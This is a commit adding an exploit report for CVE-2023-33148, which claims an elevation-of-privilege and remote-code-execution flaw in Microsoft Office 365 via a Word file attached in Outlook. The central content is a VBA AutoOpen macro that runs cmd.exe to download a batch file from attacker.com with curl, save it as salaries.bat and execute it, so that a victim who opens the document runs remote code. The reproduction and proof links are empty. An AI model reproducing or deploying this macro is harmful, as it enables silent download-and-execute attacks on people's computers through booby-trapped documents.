Add files via upload
This commit is contained in:
parent
8d88c4676e
commit
570f6c6a22
3 changed files with 45 additions and 0 deletions
BIN
2023/CVE-2023-33148/docs/Screenshot 2023-07-18 131825.png
Normal file
BIN
2023/CVE-2023-33148/docs/Screenshot 2023-07-18 131825.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 570 KiB |
BIN
2023/CVE-2023-33148/docs/Screenshot 2023-07-18 133123.png
Normal file
BIN
2023/CVE-2023-33148/docs/Screenshot 2023-07-18 133123.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 526 KiB |
45
2023/CVE-2023-33148/docs/report.txt
Normal file
45
2023/CVE-2023-33148/docs/report.txt
Normal file
|
|
@ -0,0 +1,45 @@
|
|||
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege Vulnerability + RCE.
|
||||
## Author: nu11secur1ty
|
||||
## Date: 07.18.2023
|
||||
## Vendor: https://www.microsoft.com/
|
||||
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
|
||||
## Reference: https://portswigger.net/web-security/access-control
|
||||
## CVE-2023-33148
|
||||
|
||||
|
||||
## Description:
|
||||
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege.
|
||||
The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it - opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim's PC, it depends on the scenario.
|
||||
|
||||
## Staus: HIGH Vulnerability
|
||||
|
||||
[+]Exploit:
|
||||
|
||||
- Exploit Server:
|
||||
|
||||
```vb
|
||||
Sub AutoOpen()
|
||||
Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus)
|
||||
End Sub
|
||||
|
||||
```
|
||||
|
||||
## Reproduce:
|
||||
[href]()
|
||||
|
||||
## Proof and Exploit
|
||||
[href]()
|
||||
|
||||
## Time spend:
|
||||
00:35:00
|
||||
|
||||
|
||||
--
|
||||
System Administrator - Infrastructure Engineer
|
||||
Penetration Testing Engineer
|
||||
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
|
||||
https://cxsecurity.com/ and https://www.exploit-db.com/
|
||||
0day Exploit DataBase https://0day.today/
|
||||
home page: https://www.nu11secur1ty.com/
|
||||
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
||||
nu11secur1ty <http://nu11secur1ty.com/>
|
||||
Loading…
Add table
Add a link
Reference in a new issue